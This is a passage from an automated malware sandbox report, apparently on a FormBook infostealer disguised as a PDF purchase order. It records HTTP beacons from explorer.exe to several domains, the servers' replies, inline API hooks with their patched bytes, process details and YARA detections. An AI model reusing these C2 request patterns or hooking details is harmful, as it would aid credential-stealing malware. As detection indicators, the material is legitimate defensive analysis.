                                          Aug 22, 2023 13:42:37.152482986 CEST16OUTGET /sn26/?kJBLpb8=EN17TsAzaZG5OYgbKAyh3RhQlZ+M+bHTnDIlweAI/VTqrT2/7Z1rXkvFwetHy2WBWOd9&ML0tl=NZlpi HTTP/1.1
                                          Host: www.bmmboo.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Aug 22, 2023 13:42:37.276149988 CEST17INHTTP/1.1 302 Found
                                          Date: Tue, 22 Aug 2023 11:42:37 GMT
                                          Content-Type: text/html; charset=iso-8859-1
                                          Content-Length: 305
                                          Connection: close
                                          Server: Apache/2
                                          Location: https://www.bmmboo.com/sn26/?kJBLpb8=EN17TsAzaZG5OYgbKAyh3RhQlZ+M+bHTnDIlweAI/VTqrT2/7Z1rXkvFwetHy2WBWOd9&ML0tl=NZlpi
                                          Cache-Control: max-age=3600
                                          Expires: Tue, 22 Aug 2023 12:42:37 GMT
                                          Age: 0
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6d 6d 62 6f 6f 2e 63 6f 6d 2f 73 6e 32 36 2f 3f 6b 4a 42 4c 70 62 38 3d 45 4e 31 37 54 73 41 7a 61 5a 47 35 4f 59 67 62 4b 41 79 68 33 52 68 51 6c 5a 2b 4d 2b 62 48 54 6e 44 49 6c 77 65 41 49 2f 56 54 71 72 54 32 2f 37 5a 31 72 58 6b 76 46 77 65 74 48 79 32 57 42 57 4f 64 39 26 61 6d 70 3b 4d 4c 30 74 6c 3d 4e 5a 6c 70 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.bmmboo.com/sn26/?kJBLpb8=EN17TsAzaZG5OYgbKAyh3RhQlZ+M+bHTnDIlweAI/VTqrT2/7Z1rXkvFwetHy2WBWOd9&amp;ML0tl=NZlpi">here</a>.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.94971235.233.138.13280C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Aug 22, 2023 13:42:58.501535892 CEST18OUTGET /sn26/?kJBLpb8=ad9cmfoqC6MwmQXB3DEhd3FKpHJj9M1rumkw8RT4btYHOQ1rLKeZlf6UtJZu69H1aK6T&ML0tl=NZlpi HTTP/1.1
                                          Host: www.ownlegalhelp.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Aug 22, 2023 13:42:58.665471077 CEST18INHTTP/1.1 302 Found
                                          Date: Tue, 22 Aug 2023 11:42:58 GMT
                                          Server: Apache
                                          Location: https://www.ownlegalhelp.com/sn26/?kJBLpb8=ad9cmfoqC6MwmQXB3DEhd3FKpHJj9M1rumkw8RT4btYHOQ1rLKeZlf6UtJZu69H1aK6T&ML0tl=NZlpi
                                          Content-Length: 311
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 77 6e 6c 65 67 61 6c 68 65 6c 70 2e 63 6f 6d 2f 73 6e 32 36 2f 3f 6b 4a 42 4c 70 62 38 3d 61 64 39 63 6d 66 6f 71 43 36 4d 77 6d 51 58 42 33 44 45 68 64 33 46 4b 70 48 4a 6a 39 4d 31 72 75 6d 6b 77 38 52 54 34 62 74 59 48 4f 51 31 72 4c 4b 65 5a 6c 66 36 55 74 4a 5a 75 36 39 48 31 61 4b 36 54 26 61 6d 70 3b 4d 4c 30 74 6c 3d 4e 5a 6c 70 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.ownlegalhelp.com/sn26/?kJBLpb8=ad9cmfoqC6MwmQXB3DEhd3FKpHJj9M1rumkw8RT4btYHOQ1rLKeZlf6UtJZu69H1aK6T&amp;ML0tl=NZlpi">here</a>.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          3192.168.2.94971334.102.136.18080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Aug 22, 2023 13:43:19.690083027 CEST20OUTGET /sn26/?kJBLpb8=CpYCJqaIXUbm3IVdfGXcfWVbwpqiZyf/2rRsJh0RGmHsf115fz67BvVx/+oGOa6+KG1D&ML0tl=NZlpi HTTP/1.1
                                          Host: www.4tbbwa.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Aug 22, 2023 13:43:19.819530010 CEST20INHTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Tue, 22 Aug 2023 11:43:19 GMT
                                          Content-Type: text/html
                                          Content-Length: 291
                                          ETag: "64e2b129-123"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          4192.168.2.949714188.114.97.780C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Aug 22, 2023 13:43:41.839078903 CEST21OUTGET /sn26/?kJBLpb8=K4V3qd++KPCvHN0rtQuWoGyJj5p2Mca2XR5lWleZSjXEQHmkvvLfGF2tUiVxqdSsVX/P&ML0tl=NZlpi HTTP/1.1
                                          Host: www.ahevrlh.xyz
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Aug 22, 2023 13:43:42.186495066 CEST22INHTTP/1.1 404 Not Found
                                          Date: Tue, 22 Aug 2023 11:43:42 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=niAMAwxlvWA95QIpUhUVUJLcGS33J%2FBi9wGcg3FG%2Fb%2BTmuDY91rzpYqRzr%2FwLuB%2Fnogc8EePl5AUiE7eHZdQCuucl8RqktnK1%2FmCVX9lR%2BHT6kH7z6Q%2BdmfyPZE1rZTD2gM%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 7faadc0e7b6a3a7e-FRA
                                          alt-svc: h3=":443"; ma=86400
                                          Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                          Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                          Aug 22, 2023 13:43:42.186521053 CEST22INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          5192.168.2.949715217.70.184.5080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Aug 22, 2023 13:44:02.773999929 CEST23OUTGET /sn26/?kJBLpb8=JTmN6zoWWGNjq6ib/pFFv2cag4i5j1OLo1K7cxhy0Qg9CF/c4lTnOzzR4r51HW/WUnmz&ML0tl=NZlpi HTTP/1.1
                                          Host: www.thirdmind.network
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Aug 22, 2023 13:44:02.814177990 CEST24INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Tue, 22 Aug 2023 11:44:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Vary: Accept-Language
                                          Data Raw: 37 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 74 68 69 72 64 6d 69 6e 64 2e 6e 65 74 77 6f 72 6b 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 6d 61 69 6e 2d 37 38 38 34 34 33 35 30 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 66 6f 6e 74 22 20 68 72 65 66 3d 22 66 6f 6e 74 73 2f 4d 6f 6e 74 73 65 72 72 61 74 2d 52 65 67 75 6c 61 72 2e 77 6f 66 66 32 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 66 6f 6e 74 22 20 68 72 65 66 3d 22 66 6f 6e 74 73 2f 4d 6f 6e 74 73 65 72 72 61 74 2d 53 65 6d 69 42 6f 6c 64 2e 77 6f 66 66 32 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 2f 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 50 61 67 65 5f 32 30 32 33 2d 72 6f 6f 74 5f 32 64 70 75 73 20 22 3e 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 72 6f 6f 74 5f 31 41 47 79 31 20 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 72 6f 6f 74 5f 71 68 4d 51 32 22 3e 3c 64 69 76 3e 3c 61 72 74 69 63 6c 65 20 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 3c 2f 68 31 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 65 78 74 5f 33 37 6e 71 4f 20 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 74 65 78 74 5f 31 4a 5a 79 73 22 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 68 6f 69 73 2e 67 61 6e 64 69 2e 6e 65 74 2f 65 6e 2f 72 65 73 75 6c 74 73 3f 73 65 61 72 63 68 3d 74 68 69 72 64 6d 69 6e 64 2e 6e 65 74 77 6f 72 6b 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73
                                          Data Ascii: 79d<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>thirdmind.network</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=thirdmind.network"><strong>View the WHOIS results
                                          Aug 22, 2023 13:44:02.814225912 CEST25INData Raw: 20 6f 66 20 74 68 69 72 64 6d 69 6e 64 2e 6e 65 74 77 6f 72 6b 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68 65 20 64 6f 6d 61 69 6e e2 80 99 73 20 70 75 62 6c 69 63 20 72 65 67 69 73 74 72 61 74 69 6f 6e 20 69 6e 66 6f 72
                                          Data Ascii: of thirdmind.network</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_2023-borderbox_1Gwb_"><span class="Parkin
                                          Aug 22, 2023 13:44:02.814245939 CEST25INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          6192.168.2.94971634.149.87.4580C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Aug 22, 2023 13:44:28.778609037 CEST26OUTGET /sn26/?kJBLpb8=pgVZ8pYUx/mb3SHekAxrqKnjfvNT295Kch72LXoG5YoxLYYfuZ6zPfF7UahT16hGXPUe&ML0tl=NZlpi HTTP/1.1
                                          Host: www.thewhiteorchidspa.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Aug 22, 2023 13:44:28.919048071 CEST27INHTTP/1.1 301 Moved Permanently
                                          Content-Length: 0
                                          Location: https://www.thewhiteorchidspa.com/sn26?kJBLpb8=pgVZ8pYUx%2Fmb3SHekAxrqKnjfvNT295Kch72LXoG5YoxLYYfuZ6zPfF7UahT16hGXPUe&ML0tl=NZlpi
                                          Strict-Transport-Security: max-age=3600
                                          X-Wix-Request-Id: 1692704668.8142199527221550
                                          Age: 0
                                          Cache-Control: no-cache
                                          X-Content-Type-Options: nosniff
                                          Server: Pepyaka/1.19.10
                                          Accept-Ranges: bytes
                                          Date: Tue, 22 Aug 2023 11:44:28 GMT
                                          X-Served-By: cache-lin2290021-LIN
                                          X-Cache: MISS
                                          Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_g
                                          X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NYMupe6WQf6MVMrzEUOojIK30U7RbSHN8wnIjYHleQHv,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=,2d58ifebGbosy5xc+FRali1CcZkbfiT1SWjM/tkAtQiFM/lIMQPSgLvcrzB3pdCuxmHv8JmZfQswK4rISLAEpDPlAX9aDyZtbYPVeMeJwl0=,2UNV7KOq4oGjA5+PKsX47PpAuGwGFDWggbLa+hP4SSpWd3xniMsr1HjrszKGvMzr,mItJhVIV+SAqRuhTJgrT3ivxECPgOA7K/yeqqYiUWBg=,QR6LYlxR64IEv6P3lj/fyGr8XOCa52uZdB4PYU0IZ0g=,YobcUJuAWHc9YoUVfe+pzAgFKtWLY0Gl8zD7GB0L7jUHg6lQbHmlQg7mpprLwux1wxiyk/N2PvO2GMIYvPcR0A==
                                          Via: 1.1 google
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          7192.168.2.949733107.148.25.12280C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Aug 22, 2023 13:45:13.541361094 CEST2776OUTGET /sn26/?kJBLpb8=ueTspPcvStQ4P/B/BGMviMSUI7+26iAWBkDAplOqW0XstMbPZQlOryCbf8ldO6To/Dtn&ML0tl=NZlpi HTTP/1.1
                                          Host: www.uahrbqtj.cfd
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Aug 22, 2023 13:45:13.708733082 CEST2776INHTTP/1.1 403 Forbidden
                                          Server: nginx
                                          Date: Tue, 22 Aug 2023 11:45:18 GMT
                                          Content-Type: text/html
                                          Content-Length: 146
                                          Connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                          Code Manipulations

                                          Function NameHook TypeActive in Processes
                                          PeekMessageAINLINEexplorer.exe
                                          PeekMessageWINLINEexplorer.exe
                                          GetMessageWINLINEexplorer.exe
                                          GetMessageAINLINEexplorer.exe
                                          Function NameHook TypeNew Data
                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xEF
                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xEF
                                          GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xEF
                                          GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xEF

                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:13:41:21
                                          Start date:22/08/2023
                                          Path:C:\Users\user\Desktop\PO-230821_pdf.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\PO-230821_pdf.exe
                                          Imagebase:0x400000
                                          File size:260'228 bytes
                                          MD5 hash:AC43233DD5FE6D55C112660DC700E564
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:2
                                          Start time:13:41:22
                                          Start date:22/08/2023
                                          Path:C:\Users\user\Desktop\PO-230821_pdf.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\PO-230821_pdf.exe
                                          Imagebase:0x400000
                                          File size:260'228 bytes
                                          MD5 hash:AC43233DD5FE6D55C112660DC700E564
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low
                                          Has exited:true

                                          Target ID:3
                                          Start time:13:41:26
                                          Start date:22/08/2023
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff69ce30000
                                          File size:4'704'752 bytes
                                          MD5 hash:EEC7F02FBAE12687726D441FFADC051D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.3619293935.00000000113AE000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:4
                                          Start time:13:41:31
                                          Start date:22/08/2023
                                          Path:C:\Windows\SysWOW64\autofmt.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\SysWOW64\autofmt.exe
                                          Imagebase:0x4e0000
                                          File size:824'320 bytes
                                          MD5 hash:A5202257A05BB4D3773A2717317C2D95
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:5
                                          Start time:13:41:31
                                          Start date:22/08/2023
                                          Path:C:\Windows\SysWOW64\control.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\control.exe
                                          Imagebase:0xd10000
                                          File size:148'992 bytes
                                          MD5 hash:4DBD69D4C9DA5AAAC731F518EF8EBEA0
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
